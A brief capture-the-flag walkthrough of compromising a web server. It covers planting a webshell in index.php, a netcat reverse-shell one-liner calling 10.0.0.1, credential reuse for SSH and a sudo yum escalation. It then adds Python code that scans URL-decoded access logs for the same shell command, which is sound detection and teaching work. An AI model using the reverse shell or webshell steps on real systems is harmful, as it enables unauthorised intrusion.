Let's Start !!!
First, start with the nmap scan: "nmap -sV -A -oN nmap/initial $IP -vv"
Log in to the website with the password and add a webshell to the index.php file. Now use the webshell to get a reverse shell: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f" But before using it, encode it with a URL encoder.
If you open that file you will find some base64-encoded strings. After decoding them you will see some interesting creds. You will find the password of root's mysql server, but it's also the ssh password of jjameson. Run 'sudo -l' and you will see that you can run 'yum' with sudo.
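Seen from the defender's side, the URL-encoded reverse-shell request above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original walkthrough: it decodes each request target (up to three rounds, to catch double encoding) and flags lines that combine several traits of the named-pipe shell. The log lines, the client address and the "cmd" query parameter are constructed assumptions.

```python
import re
from urllib.parse import quote, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Independent traits of a named-pipe reverse shell; two or more together is a strong signal.
INDICATORS = {
    "mkfifo": re.compile(r"\bmkfifo\s+/\S+"),
    "interactive_shell": re.compile(r"(?<!\w)(?:/bin/)?(?:ba|da)?sh\s+-i\b"),
    "netcat_connect": re.compile(r"\bn(?:c|cat)\s+\S+\s+\d{1,5}\b"),
}

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return the sorted indicator names found in one log line's request target."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = fully_decode(match.group(1))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(target))

def suspicious(lines, threshold=2):
    """Return (line_number, indicators) for lines with at least `threshold` hits."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if len(hits) >= threshold:
            results.append((number, hits))
    return results

# Constructed sample log: client address and the `cmd` parameter are assumptions.
_CMD = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f"
_ONCE = quote(_CMD, safe="")
_LOG = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    _LOG.format("/index.php?option=com_content&view=article"),
    _LOG.format("/index.php?cmd=" + _ONCE),
    _LOG.format("/index.php?cmd=" + quote(_ONCE, safe="")),
    _LOG.format("/index.php?q=mkfifo+/tmp/pipe"),
]

if __name__ == "__main__":
    for number, hits in suspicious(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Commands sent to a webshell in a POST body do not appear in a standard access log, so this check only covers query-string use.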
Finished !!!!! :)